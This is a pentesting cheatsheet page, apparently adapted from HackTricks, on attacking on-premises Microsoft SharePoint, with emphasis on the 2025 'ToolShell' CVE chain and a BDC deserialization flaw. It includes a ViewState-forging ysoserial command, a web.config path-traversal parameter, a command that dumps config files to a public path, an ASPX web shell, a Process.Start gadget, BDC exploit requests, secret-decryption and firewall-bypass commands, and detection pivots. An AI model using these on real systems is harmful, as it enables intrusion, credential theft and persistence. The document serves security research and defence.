daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

microsoft-sharepoint.md (18765B)


      1 ---
      2 title: "Microsoft SharePoint – Pentesting & Exploitation"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Microsoft SharePoint – Pentesting & Exploitation
     14 
     15 > Microsoft SharePoint (on-premises) is built on top of ASP.NET/IIS.  Most of the classic web attack surface (ViewState, Web.Config, web shells, etc.) is therefore present, but SharePoint also ships with hundreds of proprietary ASPX pages and web services that dramatically enlarge the exposed attack surface.  This page collects practical tricks to enumerate, exploit and persist inside SharePoint environments with emphasis on the 2025 exploit chain disclosed by Unit42 (CVE-2025-49704/49706/53770/53771).
     16 
     17 ## 1. Quick enumeration
     18 
     19 ```text
     20 # favicon hash and keywords
     21 curl -s https://<host>/_layouts/15/images/SharePointHome.png
     22 curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI
     23 
     24 # version leakage (often in JS)
     25 curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"
     26 
     27 # interesting standard paths
     28 /_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
     29 /_vti_bin/Lists.asmx                     # legacy SOAP service
     30 /_catalogs/masterpage/Forms/AllItems.aspx
     31 
     32 # enumerate sites & site-collections (requires at least Anonymous)
     33 python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>
     34 ```
     35 
     36 ## 2. 2025 exploit chain (a.k.a. “ToolShell”)
     37 
     38 CISA's technical analysis documents ToolShell exploitation artifacts and detection guidance that can be used to reproduce indicators safely in an authorized lab.<sup>[[6]](#references)</sup>
     39 
     40 For exploit internals, the Securelist analysis walks through `ToolPane.aspx`, the relevant SharePoint code path, and observed payload behavior.<sup>[[7]](#references)</sup> Prefer validated analyses over speculative GitHub repositories: Eye Security explicitly removed links to unverified ToolShell PoCs, noting that the effective chain does not require a file write.<sup>[[8]](#references)</sup>
     41 
     42 ### 2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx
     43 
     44 `/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload>` allows arbitrary *Server-Side Include* code to be injected in the page which is later compiled by ASP.NET.  An attacker can embed C# that executes `Process.Start()` and drop a malicious ViewState.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
     45 
     46 ### 2.2 CVE-2025-49706 – Improper Authentication Bypass
     47 
     48 The same page trusts the **X-Forms_BaseUrl** header to determine the site context.  By pointing it to `/_layouts/15/`,  MFA/SSO enforced at the root site can be bypassed **unauthenticated**.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
     49 
     50 ### 2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization → RCE
     51 
     52 Once the attacker controls a gadget in `ToolPane.aspx` they can post an **unsigned** (or MAC-only) `__VIEWSTATE` value that triggers .NET deserialization inside *w3wp.exe* leading to code execution.<sup>[[1]](#references)</sup><sup>[[4]](#references)</sup>
     53 
     54 If signing is enabled, steal the **ValidationKey/DecryptionKey** from any `web.config` (see 2.4) and forge the payload with *ysoserial.net* or *ysodom*:<sup>[[1]](#references)</sup>
     55 
     56 ```text
     57 ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
     58     ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt
     59 ```
     60 
     61 For an in-depth explanation on abusing ASP.NET ViewState read:
     62 
     63 [Exploiting   Viewstate Parameter](/hacktricks/pentesting-web/deserialization/exploiting-viewstate-parameter)
     64 
     65 ### 2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure
     66 
     67 Sending a crafted `Source` parameter to `ToolPane.aspx` (e.g. `../../../../web.config`) returns the targeted file, allowing leakage of:<sup>[[1]](#references)</sup><sup>[[4]](#references)</sup>
     68 
     69 * `<machineKey validationKey="…" decryptionKey="…">`  ➜ forge ViewState / ASPXAUTH cookies
     70 * connection strings & secrets.
     71 
     72 ### 2.5 ToolShell workflow observed in Ink Dragon intrusions
     73 
     74 Check Point mapped how Ink Dragon operationalised the ToolShell chain months before Microsoft shipped fixes:<sup>[[5]](#references)</sup>
     75 
     76 * **Header spoofing for auth bypass** – the actor sends POSTs to `/_layouts/15/ToolPane.aspx` with `Referer: https://<victim>/_layouts/15/` plus a fake `X-Forms_BaseUrl`. Those headers convince SharePoint that the request originates from a trusted layout and completely skip front-door authentication (CVE-2025-49706/CVE-2025-53771).
     77 * **Serialized gadget in the same request** – the body includes attacker-controlled ViewState/ToolPart data that reaches the vulnerable server-side formatter (CVE-2025-49704/CVE-2025-53770). The payload is usually a ysoserial.net chain that runs inside `w3wp.exe` without ever touching disk.
     78 * **Internet-scale scanning** – telemetry from July 2025 shows them enumerating every reachable `/_layouts/15/ToolPane.aspx` endpoint and replaying a dictionary of leaked `<machineKey>` pairs. Any site that copied a sample `validationKey` from documentation can be compromised even if it is otherwise fully patched (see the ViewState page for the signing workflow).
     79 * **Immediate staging** – successful exploitation drops a loader or PowerShell stager that: (1) dumps every `web.config`, (2) plants an ASPX webshell for contingency access, and (3) schedules a local Potato privesc to escape the IIS worker.
     80 
     81 ## 3. Post-exploitation recipes observed in the wild
     82 
     83 ### 3.1 Exfiltrate every *.config* file (variation-1)
     84 
     85 ```text
     86 cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"
     87 ```
     88 
     89 The resulting `debug_dev.js` can be downloaded anonymously and contains **all** sensitive configuration.<sup>[[1]](#references)</sup>
     90 
     91 ### 3.2 Deploy a Base64-encoded ASPX web shell (variation-2)
     92 
     93 ```text
     94 powershell.exe -EncodedCommand <base64>
     95 ```
     96 
     97 Decoded payload example (shortened):
     98 
     99 ```csharp
    100 <%@ Page Language="C#" %>
    101 <%@ Import Namespace="System.Security.Cryptography" %>
    102 <script runat="server">
    103     protected void Page_Load(object sender, EventArgs e){
    104         Response.Write(MachineKey.ValidationKey);
    105         // echo secrets or invoke cmd
    106     }
    107 </script>
    108 ```
    109 Written to:
    110 
    111 ```text
    112 C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
    113 ```
    114 
    115 The shell exposes endpoints to **read / rotate machine keys** which allows forging ViewState and ASPXAUTH cookies across the farm.<sup>[[1]](#references)</sup>
    116 
    117 ### 3.3 Obfuscated variant (variation-3)
    118 
    119 Same shell but:<sup>[[1]](#references)</sup>
    120 * dropped under `...\15\TEMPLATE\LAYOUTS\`
    121 * variable names reduced to single letters
    122 * `Thread.Sleep(<ms>)` added for sandbox-evasion & timing-based AV bypass.
    123 
    124 ### 3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (observed 2025-2026)
    125 
    126 Recent incident-response investigations (Unit42 “Project AK47”) show how attackers leverage the ToolShell chain **after initial RCE** to deploy a dual-channel C2 implant and ransomware in SharePoint environments:<sup>[[3]](#references)</sup>
    127 
    128 #### AK47C2 – `dnsclient` variant
    129 
    130 * Hard-coded DNS server: `10.7.66.10` communicating with authoritative domain `update.updatemicfosoft.com`.
    131 * Messages are JSON objects XOR-encrypted with the static key `VHBD@H`, hex-encoded and embedded as **sub-domain labels**.
    132 
    133   ```json
    134   {"cmd":"<COMMAND>","cmd_id":"<ID>"}
    135   ```
    136 
    137 * Long queries are chunked and prefixed with `s`, then re-assembled server-side.
    138 * Server replies in TXT records carrying the same XOR/hex scheme:
    139 
    140   ```json
    141   {"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
    142   ```
    143 * Version 202504 introduced a simplified format `<COMMAND>::<SESSION_KEY>` and chunk markers `1`, `2`, `a`.
    144 
    145 #### AK47C2 – `httpclient` variant
    146 
    147 * Re-uses the exact JSON & XOR routine but sends the hex blob in the **HTTP POST body** via `libcurl` (`CURLOPT_POSTFIELDS`, etc.).
    148 * Same task/result workflow allowing:
    149   * Arbitrary shell command execution.
    150   * Dynamic sleep interval and kill-switch instructions.
    151 
    152 #### X2ANYLOCK ransomware
    153 
    154 * 64-bit C++ payload loaded through DLL side-loading (see below).
    155 * Employs AES-CBC for file data + RSA-2048 to wrap the AES key, then appends the extension `.x2anylock`.
    156 * Recursively encrypts local drives and discovered SMB shares; skips system paths.
    157 * Drops clear-text note `How to decrypt my data.txt` embedding a static **Tox ID** for negotiations.
    158 * Contains an internal **kill-switch**:
    159 
    160   ```c
    161   if (file_mod_time >= "2026-06-06") exit(0);
    162   ```
    163 
    164 #### DLL side-loading chain
    165 
    166 1. Attacker writes `dllhijacked.dll`/`My7zdllhijacked.dll` next to a legitimate `7z.exe`.
    167 2. SharePoint-spawned `w3wp.exe` launches `7z.exe`, which loads the malicious DLL because of Windows search order, invoking the ransomware entrypoint in memory.
    168 3. A separate LockBit loader observed (`bbb.msi` ➜ `clink_x86.exe` ➜ `clink_dll_x86.dll`) decrypts shell-code and performs **DLL hollowing** into `d3dl1.dll` to run LockBit 3.0.
    169 
    170 > [!INFO]
    171 > The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.
    172 
    173 ### 3.5 Turning SharePoint loot into lateral movement
    174 
    175 * **Decrypt every protected section** – once seated on the web tier, abuse `aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri` (or `-px "appSettings"`) to dump the clear-text secrets hiding behind `<connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">`. Ink Dragon repeatedly harvested SQL logins, SMTP relays and custom service credentials this way.<sup>[[5]](#references)</sup>
    176 * **Recycle app-pool accounts across farms** – many enterprises reuse the same domain account for `IIS APPPOOL\SharePoint` on every front-end. After decrypting `identity impersonate="..."` blocks or reading `ApplicationHost.config`, test the credential over SMB/RDP/WinRM to every sibling server. In multiple incidents the account was also a local administrator, allowing `psexec`, `sc create`, or scheduled-task staging without triggering password sprays.<sup>[[5]](#references)</sup>
    177 * **Abuse leaked `<machineKey>` values internally** – even if the internet perimeter gets patched, reusing the same `validationKey`/`decryptionKey` allows lateral ViewState exploitation between internal SharePoint zones that trust each other.
    178 
    179 ### 3.6 Persistence patterns witnessed in 2025 intrusions
    180 
    181 * **Scheduled tasks** – a one-shot task named `SYSCHECK` (or other health-themed names) is created with `/ru SYSTEM /sc once /st <hh:mm>` to bootstrap the next-stage loader (commonly a renamed `conhost.exe`). Because it is run-once, telemetry often misses it unless historic task XML is preserved.<sup>[[5]](#references)</sup>
    182 * **Masqueraded services** – services such as `WindowsTempUpdate`, `WaaSMaintainer`, or `MicrosoftTelemetryHost` are installed via `sc create` pointing at the sideloading triad directory. The binaries keep their original AMD/Realtek/NVIDIA signatures but are renamed to match Windows components; comparing the on-disk name with the `OriginalFileName` PE field is a quick integrity check.<sup>[[5]](#references)</sup>
    183 
    184 ### 3.7 Host firewall downgrades for relay traffic
    185 
    186 Ink Dragon routinely adds a permissive outbound rule that masquerades as Defender maintenance so ShadowPad/FinalDraft traffic can exit on any port:<sup>[[5]](#references)</sup>
    187 
    188 ```batch
    189 netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any
    190 ```
    191 
    192 Because the rule is created locally (not via GPO) and uses the legitimate Defender binary as `program=`, most SOC baselines ignore it, yet it opens **Any ➜ Any** egress.<sup>[[5]](#references)</sup>
    193 
    194 ## 4. BDC model metadata as a .NET object-construction sink
    195 
    196 SharePoint Business Data Connectivity (BDC) models can act as XML object-graph descriptions rather than passive database schemas. A `TypeDescriptor` can name a .NET type and contain nested descriptors for its fields or properties. Older BDC research already showed that trusting model-defined method parameter types can expose attacker-controlled `XmlSerializer` streams, so `.bdcm` upload and execution permissions form a security boundary.<sup>[[9]](#references)</sup>
    197 
    198 ### 4.1 Unrestricted type resolution and reflective property assignment
    199 
    200 For a `Database` LOB system, `DbTypeReflector.ResolveDotNetType()` sends names shorter than 15 characters through a limited base resolver, but passes names of 15 or more characters directly to `Type.GetType(name, throwOnError: true)`. Without an assembly/type allowlist, an assembly-qualified `TypeName` can therefore select classes available in the Global Assembly Cache. `DotNetTypeReflector.Instantiate()` then recursively constructs the nested descriptors, converts their default values, and assigns them through reflection. The important audit primitive is **attacker-selected type + recursive construction + reflected property setters**, even when no conventional formatter is present.<sup>[[11]](#references)</sup>
    201 
    202 A property assignment may execute code rather than only store data. The `ObjectDataProvider` chain uses a nested `ProcessStartInfo` and `Process`; setting `ObjectInstance` refreshes the provider and invokes the method selected by `MethodName` on that object. The generic gadget internals are described on the [.NET deserialization page](/hacktricks/pentesting-web/deserialization/basic-net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json-net).<sup>[[10]](#references)[[11]](#references)</sup>
    203 
    204 ```csharp
    205 var odp = new ObjectDataProvider { MethodName = "Start" };
    206 var psi = new ProcessStartInfo {
    207     UseShellExecute = false,
    208     CreateNoWindow = true,
    209     FileName = "cmd.exe",
    210     Arguments = "/c whoami > C:\\Windows\\Temp\\bdc.txt"
    211 };
    212 var process = new Process { StartInfo = psi };
    213 odp.ObjectInstance = process; // Refresh -> reflective Process.Start()
    214 ```
    215 
    216 ### 4.2 Store first, materialize later
    217 
    218 Uploading the model only stores the graph. A useful trigger must reach default-value construction: a Client Object Model request containing `FindSpecificDefault` calls `CreateDefaultParameterInstancesInternal` and eventually `DotNetTypeReflector.Instantiate()`, so the dangerous setter runs before a useful database result is required. A compact request sequence is:<sup>[[11]](#references)</sup>
    219 
    220 ```http
    221 POST /_api/web/folders
    222 {"__metadata":{"type":"SP.Folder"},"ServerRelativeUrl":"BusinessDataMetadataCatalog"}
    223 
    224 POST /_api/web/GetFolderByServerRelativeUrl('BusinessDataMetadataCatalog')/Files/add(url='model.bdcm',overwrite=true)
    225 
    226 POST /_vti_bin/client.svc/ProcessQuery
    227 ...
    228 <Method Name="FindSpecificDefault" ... />
    229 ```
    230 
    231 These requests normally require an authorized identity and a valid `X-RequestDigest`; an independent authentication bypass that supplies the Bearer token and digest converts the post-authentication primitive into an unauthenticated chain.<sup>[[11]](#references)</sup>
    232 
    233 Do not assume one LOB type or gadget. An independent chain used a `DotNetAssembly` LOB to resolve and instantiate `System.Web.UI.LosFormatter`, then invoked its `Deserialize` instance method with a model-supplied default value. This demonstrates that the durable issue is unsafe type selection/materialization, not an `ObjectDataProvider` signature.<sup>[[12]](#references)</sup>
    234 
    235 ### 4.3 Detection pivots
    236 
    237 Correlate the following server, proxy, and endpoint signals rather than matching only one payload family:<sup>[[11]](#references)[[12]](#references)</sup>
    238 
    239 - Creation of `BusinessDataMetadataCatalog`, followed by a `.bdcm` upload through `/_api/web/GetFolderByServerRelativeUrl(...)/Files/add`.
    240 - `/_vti_bin/client.svc/ProcessQuery` bodies containing BDC entity identities and methods such as `FindSpecificDefault`.
    241 - Unexpected assembly-qualified `TypeName` values, especially references to `ObjectDataProvider`, `System.Diagnostics.Process`, `ProcessStartInfo`, or `LosFormatter`.
    242 - Unusual child processes of SharePoint's `w3wp.exe`; keep this process-tree signal even when the model uses a different LOB or gadget.
    243 
    244 ---
    245 
    246 ## Related tricks
    247 
    248 * IIS post-exploitation & web.config abuse:  
    249 
    250 [Iis Internet Information Services](/hacktricks/network-services-pentesting/pentesting-web/iis-internet-information-services)
    251 
    252 ## References
    253 
    254 - [1] [Unit42 – Active Exploitation of Microsoft SharePoint Vulnerabilities](https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/)
    255 - [2] [Microsoft Security Advisory – CVE-2025-49704 / 49706](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-49704)
    256 - [3] [Unit42 – Project AK47 / SharePoint Exploitation & Ransomware Activity](https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/)
    257 - [4] [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770)
    258 - [5] [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
    259 - [6] [CISA – ToolShell exploitation IOCs and activity](https://www.cisa.gov/sites/default/files/2025-08/CMA_SIGMA_251132_1_CVE_2025_53770_ToolShell_TLP_CLEAR.pdf)
    260 - [7] [Securelist – Analysis of the ToolShell vulnerabilities and exploit code](https://securelist.com/toolshell-explained/117045/)
    261 - [8] [Eye Security – SharePoint under siege: validated ToolShell analysis](https://labs.eye.security/sharepoint-under-siege/)
    262 - [9] [ZDI – CVE-2019-1257: Code Execution on Microsoft SharePoint Through BDC Deserialization](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization)
    263 - [10] [ysoserial.net – ObjectDataProvider generator](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/ObjectDataProviderGenerator.cs)
    264 - [11] [Rapid7 – Microsoft SharePoint BDC remote code execution analysis](https://www.rapid7.com/blog/post/ra-microsoft-sharepoint-remote-code-execution-cve-2026-63520/)
    265 - [12] [VulnCheck – SharePoint unsafe type RCE chain](https://www.vulncheck.com/blog/cve-2026-63520-sharepoint-unsafe-type-rce)